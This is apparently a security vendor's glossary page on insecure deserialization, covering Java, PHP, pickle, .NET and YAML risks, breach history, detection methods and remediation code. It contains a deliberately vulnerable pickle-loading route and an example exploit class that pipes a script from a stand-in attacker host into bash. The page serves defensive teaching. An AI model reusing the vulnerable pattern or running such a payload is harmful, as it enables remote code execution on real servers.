Insecure Deserialization
Insecure Deserialization allows attackers to manipulate serialized objects to achieve remote code execution, privilege escalation, or data tampering by exploiting an application's trust in serialized data.
Technical Description
Insecure Deserialization occurs when an application deserializes (reconstructs objects from their serialized byte or string representation) untrusted data without adequate validation. Serialization is used to persist objects, transmit them across networks, or store them in caches and sessions. When an attacker can manipulate serialized data, they can alter application logic, tamper with data, or, most critically, achieve remote code execution.
The severity of deserialization vulnerabilities depends on the serialization format and the available “gadget chains” in the application’s classpath or runtime:
- Java Deserialization: Java’s native
ObjectInputStream.readObject()is notoriously dangerous. Libraries like Apache Commons Collections, Spring, and others contain gadget chains that transform deserialization into arbitrary code execution. Tools like ysoserial generate payloads for dozens of known gadget chains. - PHP Object Injection: PHP’s
unserialize()function can instantiate arbitrary classes and invoke magic methods (__wakeup(),__destruct(),__toString()). Attackers chain these magic methods through application or framework classes to achieve file operations, SQL injection, or code execution. - Python Pickle: Python’s
picklemodule executes arbitrary Python code during deserialization by design. The__reduce__method allows defining a callable and its arguments that execute upon unpickling. - .NET Deserialization: BinaryFormatter, SoapFormatter, and other .NET serializers are vulnerable to gadget-chain attacks similar to Java. Microsoft has deprecated BinaryFormatter as of .NET 8.
- YAML Deserialization: YAML parsers in Python (
yaml.load()), Ruby (YAML.load()), and other languages can instantiate arbitrary objects if used without safe loaders.
# Vulnerable - pickle deserialization of user input
import pickle, base64
@app.route('/load-session')
def load_session():
data = base64.b64decode(request.cookies.get('session_data'))
session = pickle.loads(data) # Arbitrary code execution
return render_template('dashboard.html', user=session)
# Attacker crafts a malicious pickle payload:
import os
class Exploit:
def __reduce__(self):
return (os.system, ('curl attacker.com/shell.sh | bash',))
Serialized data appears in multiple locations: cookies, hidden form fields, API request/response bodies, message queues, cache stores (Redis, Memcached), and inter-service communication.
Real-World Impact
Insecure deserialization has enabled some of the most severe compromises in enterprise environments:
- Equifax (2017): The breach that exposed 147 million records was enabled by CVE-2017-5638, a vulnerability in Apache Struts that involved Java deserialization in the Content-Type header parsing, allowing remote code execution.
- Apache Commons Collections (2015): The discovery of widespread Java deserialization vulnerabilities affected thousands of enterprise applications including WebLogic, JBoss, Jenkins, and WebSphere. The FoxGlove Security research paper demonstrated that nearly every Java application accepting serialized objects was vulnerable.
- PayPal (2015): Researchers discovered a Java deserialization vulnerability in PayPal’s production systems that allowed remote code execution through crafted serialized objects.
Deserialization vulnerabilities are particularly impactful because they frequently lead directly to remote code execution with the privileges of the application server, often root or a service account with broad access.
Detection Methodology
Identifying deserialization vulnerabilities requires knowledge of serialization formats and where they appear:
- Serialized Data Identification: Look for common serialization signatures in all application inputs. Java serialized objects begin with
0xACED0005(base64:rO0AB). PHP serialized data follows patterns likeO:4:"User":2:{...}. Python pickle starts with0x80or protocol-specific bytes. JSON and XML may contain type discriminators. - Technology Stack Analysis: Identify the application’s language, frameworks, and libraries. Research known gadget chains available for the detected technology stack.
- Input Manipulation: Modify serialized objects in transit. Change field values, inject unexpected types, and extend objects with additional properties. Observe how the application handles malformed serialized data.
- Gadget Chain Testing: For Java applications, use ysoserial to generate payloads for all known gadget chains against each deserialization entry point. For PHP, use PHPGGC. Monitor for out-of-band callbacks (DNS, HTTP) to confirm blind code execution.
- Code Review: Search source code for dangerous deserialization functions:
ObjectInputStream.readObject(),unserialize(),pickle.loads(),yaml.load(),BinaryFormatter.Deserialize(), andJSON.parse()with custom revivers that instantiate objects.
How Revaizor Discovers This
Revaizor’s AI agents bring deep expertise in deserialization vulnerability discovery:
- Serialization Format Detection: Revaizor identifies serialized data across all input vectors, recognizing Java, PHP, Python, .NET, and YAML serialization formats in cookies, headers, API bodies, and hidden fields. It detects both standard and custom serialization patterns.
- Technology-Specific Payloads: Based on the detected technology stack, Revaizor generates targeted deserialization payloads using the appropriate gadget chains. For Java, it tests all viable ysoserial chains based on detected classpath libraries. For PHP, it leverages PHPGGC chains matched to the application’s framework.
- Blind Exploitation: Revaizor uses out-of-band techniques (DNS and HTTP callbacks) to confirm deserialization-based code execution even when the application does not return error messages or direct output.
- Library Fingerprinting: Revaizor identifies specific library versions on the classpath through error messages, response headers, and behavioral analysis, focusing payload generation on gadget chains known to work with the detected versions.
Remediation
The most effective defense is to avoid deserializing untrusted data entirely:
# Vulnerable - pickle with untrusted input
session = pickle.loads(user_cookie)
# Secure - use JSON or signed tokens instead
import json
import hmac
def load_session(cookie, secret_key):
data, signature = cookie.rsplit('.', 1)
expected_sig = hmac.new(secret_key, data.encode(), 'sha256').hexdigest()
if not hmac.compare_digest(signature, expected_sig):
raise ValueError("Invalid session signature")
return json.loads(base64.b64decode(data))
// Java - use ObjectInputFilter (Java 9+) to restrict deserialization
ObjectInputStream ois = new ObjectInputStream(inputStream);
ois.setObjectInputFilter(filterInfo -> {
if (filterInfo.serialClass() != null) {
String className = filterInfo.serialClass().getName();
if (ALLOWED_CLASSES.contains(className)) {
return ObjectInputFilter.Status.ALLOWED;
}
return ObjectInputFilter.Status.REJECTED;
}
return ObjectInputFilter.Status.UNDECIDED;
});
Comprehensive deserialization defense:
- Eliminate Native Serialization: Replace Java
Serializable, PHPserialize()/unserialize(), and Pythonpicklewith safe data formats like JSON, Protocol Buffers, or MessagePack for inter-process and client-server communication. - Digital Signatures: If serialized data must be used, sign it with HMAC or asymmetric signatures and verify the signature before deserialization. This prevents tampering but not replay attacks.
- Deserialization Filtering: In Java, use
ObjectInputFilterto allowlist only the specific classes that should be deserialized. In Python, useyaml.safe_load()instead ofyaml.load(). - Isolation: Run deserialization in sandboxed environments with restricted permissions. Use containers or VMs for processing untrusted serialized data.
- Library Updates: Keep all libraries updated. Many deserialization gadget chains are patched in newer versions. Monitor for new gadget chain discoveries in your dependency tree.
- Runtime Protection: Deploy runtime application self-protection (RASP) or Java agent-based monitoring to detect and block deserialization attacks at runtime.
Related Glossary Terms
Related Comparisons
AI Pentesting vs Bug Bounty Programs
AI pentesting and bug bounty programs both find vulnerabilities, but they differ in predictability, coverage, cost structure, and the type of findings they surface.
Autonomous Pentesting vs PTaaS Marketplaces
Comparing AI-driven autonomous pentesting with PTaaS marketplace platforms like Cobalt and Synack to clarify where each delivery model creates the most value.
Continuous vs Annual Pentesting
Annual pentesting was designed for a world where software shipped quarterly. Continuous pentesting was designed for a world where software ships daily. Here is how to evaluate which model fits.
Related Articles
AI Pentesting vs. Vulnerability Scanners: Understanding the Difference
Scanners find potential issues. AI pentesters validate real exploits. Here's why the distinction matters.
Why Autonomous Penetration Testing Matters in 2025
Traditional pentesting can't keep up with modern release cycles. Here's how autonomous AI changes the equation.